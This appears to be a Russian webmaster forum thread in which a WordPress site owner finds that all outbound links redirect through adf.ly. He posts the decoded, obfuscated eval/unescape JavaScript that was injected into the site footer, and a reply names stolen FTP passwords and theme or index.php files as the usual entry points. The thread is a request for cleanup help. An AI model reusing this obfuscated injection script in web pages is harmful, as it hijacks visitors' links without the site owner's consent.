Форум Сайтостроение Веб-строительство

Проблемы с внешними ссылками

motorr
На сайте с 20.06.2009
Offline
75
motorr
407

В общем проблема такая - на сайте, ко всем внешним ссылкам прилепился редирект. При переходе по ссылке кидает на http://adf.ly/456315/http://www.адрес сайта/... От куда взялся adf.ly ума не приложу.

Движок wp

При просмотре исходного кода в футере есть кодированная запись в eval(unescape

Расшифровал, там получилось следующее: 

eval(unescape('function pc760f7(s) {

	var r = "";

	var tmp = s.split("11730059");

	s = unescape(tmp[0]);

	k = unescape(tmp[1] + "673629");

	for( var i = 0; i < s.length; i++) {

		r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-5);

	}

	return r;

}

'));

eval(unescape('document.write(pc760f7('') + 'G~hqjvzE}d~#`imu}ghn&D'0<=80>C	|eq'oomqx`ej}mt'K#*nu}/Cx`u,l{hw~jibnwtdgu~%D!c/mszrzdrs2ssw0q}/7`I	A2|kthrzEG~hqjvz#tn@.kys;77`nh5sw2ix2umpv5krqrlqyls0l~ @G6qnqns}@117300596606433' + unescape(''));'));

При просмотре файлов темы не нашел ни чего подобного или закодированного. Так же не нашел посторонних файлов на сервере.

В тех поддержке хостера написали "Проверьте скрипты на уязвимость". Чем лучше проверить? И что проверять, сам двиг или базу?

W
На сайте с 21.01.2009
Offline
172
weblad
#1

90% таких "взломов" это украденный трояном-вирусом пароль от ftp.

Найти куда вставили вредоносный код не всегда просто, обычно он или в файлах темы (можно перелазить тему для верности) или в index.php в корне сайта.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий